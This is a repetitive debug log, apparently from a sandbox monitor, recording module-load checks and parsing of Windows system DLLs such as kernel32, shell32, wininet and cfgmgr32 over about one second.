2020-03-24 10:16:33,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,857 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,857 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,857 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:33,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:34,013 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:34,013 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:34,029 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:34,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:34,045 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:34,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:34,059 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:34,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:34,075 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:34,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:34,075 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:34,091 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:34,091 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:34,091 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:34,107 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:34,107 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:34,107 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:34,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:34,122 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:34,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:34,138 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:34,138 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:34,138 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:34,138 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:34,154 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:34,154 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:34,168 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:34,168 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:34,168 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:34,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:34,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:34,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:34,200 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:34,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:34,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,232 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,232 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,293 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,293 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,325 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,325 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,325 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,341 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,341 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,341 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:34,357 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:34,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:34,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,403 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,403 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,403 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,434 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:34,434 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:34,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:34,450 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:34,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:34,466 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:34,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:34,496 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:34,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:34,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,543 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,543 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,575 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,637 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,637 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,637 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,714 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,714 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,714 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,714 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
